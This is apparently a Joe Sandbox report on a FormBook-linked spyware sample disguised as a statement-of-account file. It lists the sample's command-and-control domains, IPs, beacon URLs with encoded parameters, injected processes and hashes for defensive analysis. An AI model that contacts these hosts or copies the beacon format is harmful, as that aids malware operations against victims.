www.kuaimaolife.shop	38.55.251.233	true	false	unknown
www.5oxzis.top	20.2.217.253	true	false	unknown
www.it9.shop	121.254.178.239	true	false	unknown
ara-store.com	3.33.130.190	true	false	unknown
www.online-dating28.xyz	199.59.243.227	true	true	unknown
www.neuro-practicum.online	37.140.192.23	true	false	unknown
www.acuarelacr.buzz	161.97.168.245	true	false	unknown
nodigitalsmoke.org	3.33.130.190	true	false	unknown
artherapy.online	3.33.130.190	true	false	unknown
www.synd.fun	194.58.112.174	true	false	unknown
concept.pink	217.160.0.27	true	false	unknown
www.concept.pink	unknown	unknown	true	unknown
www.artherapy.online	unknown	unknown	true	unknown
www.redlakedispensery.net	unknown	unknown	true	unknown
www.stratogent.info	unknown	unknown	true	unknown
www.nodigitalsmoke.org	unknown	unknown	true	unknown
www.ara-store.com	unknown	unknown	true	unknown
www.07t90q.vip	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.neuro-practicum.online/dndz/	false	unknown
http://www.it9.shop/acqm/?0zu8A=o2yln6&VzK4o8Jx=hOk1k3UNcVwpG+EJEDicqQpIOObLS/TgyY32GlBOoCoiXDXAZ6sWDP89y5CwOebPWohVlvJHYhDsteptd/L7YydfwpVPpt2oIMR5Kfz9plXO/BQcfDKFtuw=	false	unknown
http://www.nodigitalsmoke.org/pnbu/	false	unknown
http://www.stratogent.info/f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ8LAwVs2eJKJ0+NM44t35YuY5s8XjK0+kf3wgV05m6WJetyMkfq7N/qTBt8=&0zu8A=o2yln6	false	unknown
http://www.acuarelacr.buzz/xlle/?VzK4o8Jx=e/yKpeJOjOfK3ogdJaNPolEHTgG8UOeOD7iGn6rK8RtZqhJ0uS/fq3wrSOZm1/LpQx9nm8RE0LQ7pT1GOQTyowfApUFnsluh2+dA7bAmT6aj2geZl7SaSIo=&0zu8A=o2yln6	false	unknown
http://www.artherapy.online/xha2/	false	unknown
http://www.kuaimaolife.shop/j39u/?VzK4o8Jx=Bz1f0c7bYWyPEXgQGmGeUr0iAf+T5y0lnFtnj2cpqvgmCRIzB1oQIQU/LvP87UgGwTfaSD+LVTW+9AK3Nxg5tSpiWXbGTNqEKdm6W6Th2Oxx8WLr56YoU0o=&0zu8A=o2yln6	false	unknown
http://www.stratogent.info/f3n5/	false	unknown
http://www.concept.pink/4yov/	false	unknown
http://www.toteforcar.site/dh2t/	false	unknown
http://www.synd.fun/pisq/?VzK4o8Jx=H7+I56BzzgTO14iYyfpq/0TXLnkw0DU3mxqOdQDMcBjOXdIUFfgl3gtbee+L6DVRaRQz5ZravCeTSBENiaLmUfkQqiezYkWa8l0+pkZP8o0fG616lfZJ+EU=&0zu8A=o2yln6	false	unknown
http://www.redlakedispensery.net/phw5/?0zu8A=o2yln6&VzK4o8Jx=0nIKn1KaCpmASYJA4heXTZJ4jJXOLVPKLZ7pkMbHJLxIA/G7tzth6jzDxIdIFtsfCbXgmV5eiC0y9vkRZyS1XzB4D/cnp4pLqlHudh8ra46zD/kGcOWFXek=	false	unknown
http://www.redlakedispensery.net/phw5/	false	unknown
http://www.acuarelacr.buzz/xlle/	false	unknown
http://www.online-dating28.xyz/6nb6/	false	unknown
http://www.ara-store.com/vbsv/	false	unknown
http://www.neuro-practicum.online/dndz/?VzK4o8Jx=yDZaovUERiFyto7X7qjvD9MpBTu9Oa8KDn0njxLOrnMFAtvfChH9CxwY1KA18WTPaaKEsGuRWrl0dmOTwKqBuB4/VF8aV5DH590ef19Cm2H2f9K3TYb4rxM=&0zu8A=o2yln6	false	unknown
http://www.tribevas.online/io0i/?0zu8A=o2yln6&VzK4o8Jx=SDiZucYNl7hAWjD3kY1F3Wh8SSqKLzQrPgO87aM6gvawjY1J8DLcjr26gXoQ9oM68w0z/Zj56CIgKdiiaxfLyhFp6oFJlK6eDMjbU8To92G67g984b8BKfg=	false	unknown
http://www.tribevas.online/io0i/	false	unknown
http://www.07t90q.vip/9eeu/?VzK4o8Jx=sYxoUF2rFRCkhaAkYvMCVRWDMjjY140d56kaE+tBLdvFK0LLAdAC/HAPE2DtjqQpoemNjozj05nG5pG/fmy7ZInj0cRDZa4AaOoOz07zrXAoLhIj+j079Eo=&0zu8A=o2yln6	false	unknown
http://www.kuaimaolife.shop/j39u/	false	unknown
http://www.synd.fun/pisq/	false	unknown
http://www.ara-store.com/vbsv/?VzK4o8Jx=bE1tu4Njqer8fYE3ogT5h7aBRb2mTTstgFdh6ULQtUw7pAI4rpm78pT6sJrtnBlXzUrAExT6FvXu50MEINd+YE6s/Zqjf6ffoiebp1emg4fruBFCNZ4S/qE=&0zu8A=o2yln6	false	unknown
http://www.nodigitalsmoke.org/pnbu/?VzK4o8Jx=PMosseOB4ogJQUQqTcR9kz6RlTRioPzkM9evra3bwBIimbDRItYfTtmn+Yd6ynIhbdr7j07NPWQxaS6b0vcIX3tyVS9+K21fIwIr7IsLGACriLVoa4wujys=&0zu8A=o2yln6	false	unknown
http://www.online-dating28.xyz/6nb6/?VzK4o8Jx=3cQdvvjXbDmN7AD1N3EtkTKSkRGpjOZJD5QOEJ2ov7AVnEoT92w2clvWuemcxfAXa005+24inGIyqDI1tlEn9qii/G7LnY+t45dZlk7rRI6PB0gsuL5FdqU=&0zu8A=o2yln6	false	unknown
http://www.concept.pink/4yov/?VzK4o8Jx=wLmY7AOB32o0S2u43NcX1Hs/A4Ddj7cy6rFAsgDZdNn+sW1g/TF+eJLR19ZQOPzynTi6ZGviANY3o1+5ycRVlJFFydx+2g9CgM5kEaITnei6fXkYmlY6f3w=&0zu8A=o2yln6	false	unknown
http://www.artherapy.online/xha2/?VzK4o8Jx=Rj3U+6DKgT5y3eE2BMi55/myWWswXqjiYm6dEeLSFSW8ImASiPiK/Z97R8zSc/+3mi0fAgijIiRKCB5FCR8rSXkZ7dd1+8Uof6hMEnAJapLXT04qmHdwDH0=&0zu8A=o2yln6	false	unknown
http://www.toteforcar.site/dh2t/?VzK4o8Jx=OuJ8gnv9Mf0seMPZwgWqdoiXcL8RlvinjfaO7Y1P7N6K2HIOPUsL5gVusZwNUZykZEqB/DbtgQZV6EtzKFIFDF8htWObdeNACruwjJyoWYmCvw6DdWzPF9Q=&0zu8A=o2yln6	false	unknown
http://www.it9.shop/acqm/	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.reg.ru/web-sites/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_cms&amp	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://duckduckgo.com/chrome_newtab	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://duckduckgo.com/ac/?q=	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://reg.ru	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://www.reg.ru/whois/?check=&dname=www.synd.fun&reg_source=parking_auto	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://www.google.com	replace.exe, 00000004.00000002.23450630136.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23448017177.0000000004672000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.00000000044A2000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://whois.gandi.net/en/results?search=redlakedispensery.net	replace.exe, 00000004.00000002.23448017177.00000000044E0000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000004310000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
http://x1.c.lencr.org/0	firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://x1.i.lencr.org/0	firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://c.pki.goog/r/r1.crl0	firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.synd.fun&utm_medium=parking&utm_campaig	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&am	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://www.strato.de	MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000003B36000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://stratogent.info/f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ	replace.exe, 00000004.00000002.23448017177.0000000004996000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.00000000047C6000.00000004.00000001.00040000.00000000.sdmp	false	unknown
http://i.pki.goog/r1.crt0	firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.gandi.net/en/domain	replace.exe, 00000004.00000002.23450630136.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23448017177.00000000044E0000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000004310000.00000004.00000001.00040000.00000000.sdmp	false	unknown
http://ocsp.rootca1.amazontrust.com0:	firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
https://www.ecosia.org/newtab/	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.neuro-practicum.online	MBLUUsWuClSd.exe, 00000005.00000002.23442870422.000000000167D000.00000040.80000000.00040000.00000000.sdmp	false	unknown
https://www.google.com/favicon.ico	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://ac.ecosia.org/autocomplete?q=	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&	replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	false	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://gemini.google.com/app?q=	replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.160.0.27	concept.pink	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
37.140.192.23	www.neuro-practicum.online	Russian Federation	197695	AS-REGRU	false
121.254.178.239	www.it9.shop	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
184.94.215.26	www.tribevas.online	United States	394896	VXCHNGE-NC01US	false
76.223.105.230	stratogent.info	United States	16509	AMAZON-02US	false
199.59.243.227	www.online-dating28.xyz	United States	395082	BODIS-NJUS	true
38.55.251.233	www.kuaimaolife.shop	United States	174	COGENT-174US	false
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
194.58.112.174	www.synd.fun	Russian Federation	197695	AS-REGRU	false
3.33.130.190	07t90q.vip	United States	8987	AMAZONEXPANSIONGB	false
161.97.168.245	www.acuarelacr.buzz	United States	51167	CONTABODE	false
185.104.28.27	www.toteforcar.site	Netherlands	206281	AS-ZXCSNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1527911
Start date and time:	2024-10-07 11:48:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SOA SIL TL382920.exe (renamed file extension from bat to exe)
Original Sample Name:	SOA SIL TL382920.bat
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@18/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 82 Number of non-executed functions: 225
Cookbook Comments:	Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, nexusrules.officeapps.live.com
Report creation exceeded maximum time and may have missing disassembly code information.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SOA SIL TL382920.exe

Simulations

Behavior and APIs

Time	Type	Description
05:50:25	API Interceptor	1x Sleep call for process: SOA SIL TL382920.exe modified
05:51:31	API Interceptor	13165962x Sleep call for process: replace.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
217.160.0.27	Revised Invoice H000127896.exe	Get hash	malicious	FormBook	Browse	www.concept.pink/4yov/
	hesaphareketi-01.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.austintrafficlawyer.com/ac9t/?wT7P=BSX0DHFCkeRuIuC9aNIxPjQAkc6OMQBOI5VXSM1sJH3dc8P1lqyosRwwP84ABr/cxKegDc3ylA7Q6LIOUWXqfoMCS4X8uyDH8g==&Ahm=OJYxThc8VTyL_TWP
	Antndte.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.austintrafficlawyer.com/3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1
	27112023110107pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.austintrafficlawyer.com/iv0r/?cHm4=NW3zugcUREcol4uDaFNo/hQtWcWVL6vHACe7Dopasm3sBm0TPJr15qVO75z3TpGwI48xhkksmXuol2/YLEBTMXnEJLOTbwSo8g==&vnkds=VfPlP
	PAGAMENTO_INV-85732.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.austintrafficlawyer.com/cvps/?-Lkxp=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&ojQxW=_LZhZtRhEB2XP
	INV#761538.exe	Get hash	malicious	FormBook	Browse	www.austintrafficlawyer.com/cvps/?pf5=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&kDuhz=t6NP562HYH_
	Document.exe	Get hash	malicious	FormBook	Browse	www.austintrafficlawyer.com/cvps/?Tb-PA8s8=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&0H=BrFhG8npvv
	DbkrlzhE3S.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cloudninemodels.co.uk/ks01/?bN6=Dtldzzl&oV0LWR=HXS6Dgx9Q88pip/zEWSWLsHrn6Z0ieZrAS1SZp7em4AQeDsYfhUH5nTmvgpC6C2eYvMv
	tGawAEY26l.exe	Get hash	malicious	Grandcrab, Gandcrab	Browse	lucides.co.uk/
	rl86XSdHhM.exe	Get hash	malicious	Grandcrab, Gandcrab	Browse	lucides.co.uk/
121.254.178.239	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	www.it9.shop/ecky/
76.223.105.230	Arrival notice.exe	Get hash	malicious	FormBook	Browse	www.wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.beauinthedark.net/bopi/?0T5=UL08qvZHLtV&EnAHS=ehvyC7UB7hPuNgJOlic60RckWGiOc4a88OD9LEjvmuzDnOCQ0tva4reQ7SFxdnJvODYI
	http://cloudsharehubs.com	Get hash	malicious	HTMLPhisher	Browse	cloudsharehubs.com/
	Amended Proforma #U2013 SMWD5043.exe	Get hash	malicious	FormBook	Browse	www.wearenotgoingback.info/p273/
	PO098765678.exe	Get hash	malicious	FormBook	Browse	www.wearenotgoingback.info/p273/
	http://sharepoint-heroldlaw.com/	Get hash	malicious	HTMLPhisher	Browse	sharepoint-heroldlaw.com/
	September Order.exe	Get hash	malicious	FormBook	Browse	www.wearenotgoingback.info/k94d/
	1V8XAuKZqe.exe	Get hash	malicious	FormBook	Browse	www.document-help.com/04u1/?Uj=GjN54/rEQdbG6wox13WVIJujwOfJiTO4plPVo3IW4WRqWNsQMCiLBkfbiJZOLx5Jr1TAUrJD16WcM0wD/ixmx82XNtlig0HOb2v44zuO/KoVtd/B0OdcdCo=&Fj=mfqDg
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	www.wheresthechocolateat.com/pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2
	New Al Maktoum International Airport Enquiry Ref #2401249.exe	Get hash	malicious	FormBook	Browse	www.wheresthechocolateat.com/pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
webredir.vip.gandi.net	PO-78140924.BAT.PDF.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	NVOICE FOR THE MONTH OF AUG-24.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	rP0n___87004354.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	CYTAT.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Cotizaci#U00f3n.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	ES-241-29335_pdf.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	RECIEPT.PDF.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	PO# Q919240.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	PO098765678.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
www.kuaimaolife.shop	Narudzba ACH0036173.vbe	Get hash	malicious	FormBook, GuLoader	Browse	38.55.251.233
www.kuaimaolife.shop	Revised Invoice H000127896.exe	Get hash	malicious	FormBook	Browse	38.55.251.233
www.it9.shop	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	121.254.178.239
www.5oxzis.top	Revised Invoice H000127896.exe	Get hash	malicious	FormBook	Browse	20.2.217.253

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ONEANDONE-ASBrauerstrasse48DE	https://program.meandmomorganicfarm.com/ions	Get hash	malicious	Unknown	Browse	213.165.66.58
	http://pub-ca81d9c09b8543a5a010a062d9fcad1f.r2.dev/bvsscxcxcxftw6w6wyuioopokj7565415761871891089198765243561768719810191019871725rtfgfsvghvxbxvhxgzvbanmaoiyuyuoiklsjsvgscvxbxnjwtgywuiwi63637389iopoknsxbvgccvaadwewrwwtgwywt7282929938eihdbvccvcvxbjshshghj.html	Get hash	malicious	HTMLPhisher	Browse	74.208.255.201
	Refrence-Order#63729.pdf	Get hash	malicious	Azorult	Browse	217.160.121.141
	vb.vbs	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	195.20.249.118
	http://Warehousingpro.com	Get hash	malicious	Unknown	Browse	74.208.236.23
	Order-63729_Reference.bat	Get hash	malicious	Azorult	Browse	217.160.121.141
	Refrence-Order#63729.pdf	Get hash	malicious	Azorult	Browse	217.160.121.141
	https://booking.com-partners.one/confirm/login/qAlElVVF	Get hash	malicious	Unknown	Browse	212.227.67.33
	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	217.160.0.158
	http://t-onlinogenx.vercel.app/	Get hash	malicious	Unknown	Browse	195.20.250.204
LGDACOMLGDACOMCorporationKR	UV2uLdRZix.exe	Get hash	malicious	SmokeLoader	Browse	211.181.24.133
	WhiteDefenderSetup64_20201118.exe	Get hash	malicious	GuLoader	Browse	211.171.245.2
	WhiteDefenderSetup64_20201118.exe	Get hash	malicious	GuLoader	Browse	211.171.245.2
	pur361ECCi.elf	Get hash	malicious	Mirai	Browse	61.37.14.134
	Camtech_Korea_Invoice_2024.html	Get hash	malicious	HTMLPhisher	Browse	211.43.203.70
	ZEjcJZcrXc.elf	Get hash	malicious	Mirai	Browse	106.255.148.166
	na.elf	Get hash	malicious	Mirai	Browse	112.218.246.238
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	112.220.203.109
	na.elf	Get hash	malicious	Mirai	Browse	1.223.151.51
	na.elf	Get hash	malicious	Mirai	Browse	123.143.169.210
AS-REGRU	Arrival notice.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe	Get hash	malicious	SmokeLoader	Browse	194.87.189.87
	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	hH4dbIGfGT.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Fvqw64NU4k.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	31.31.196.17
	update SOA.exe	Get hash	malicious	FormBook	Browse	31.31.196.17
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz	Browse	194.58.114.223
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	194.58.114.223
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	37.140.192.213

Process:	C:\Users\user\Desktop\SOA SIL TL382920.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	5.383229417651261
Encrypted:	false
SSDEEP:	24:ML9E4KG+1qE4DD30E4K6KDE4KhKzKhPKIE4oKXKoZAE4Kz9fhc84j:MxHKG+1qHDD30HK6YHKhSoPtHokhAHKg
MD5:	0C6917F1E76EBEA275472081BC96A4B1
SHA1:	F3106955924E1018B3C0E449368897113BC0442C
SHA-256:	669CCD2D7C3E58DF40AB95468BDEB8F2F6894A8E013766F05BAE86DFBE29BB13
SHA-512:	6A3B4A6B211274AC4C59A0835FF752F381B2DE3441E4F0A98DE372C8D88668B2EB89648302FD60EB91EE78FD5D780913F4B760CDACDE03CF4430B96C2B2AC142
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\6727d7bc35e330366d2e1724c31588d2\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\1832a65f299e4b6bb21796f03a62cbef\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\S

C:\Users\user\AppData\Local\Temp\59F79305l7

Download File

Process:	C:\Windows\SysWOW64\replace.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.9085960794285802
Encrypted:	false
SSDEEP:	384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
MD5:	17091CB4BC9C6E80CA91C12E0BBA56F4
SHA1:	ED7E485630B1245C7AE963FB02C899BF141DB578
SHA-256:	551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
SHA-512:	A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.981430703482918
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SOA SIL TL382920.exe
File size:	698'368 bytes
MD5:	caec46aaace8e50a9763dffc6c4acf0e
SHA1:	c22d85132ebd62cdf65ced2b203dca7f61490b89
SHA256:	664f584ad45e11d7afe3e4bb326959f6041653f22115327800341fa33eb19080
